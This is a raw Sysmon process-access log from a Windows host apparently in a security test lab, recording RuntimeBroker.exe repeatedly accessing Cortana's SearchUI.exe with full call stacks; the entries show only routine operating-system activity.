13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
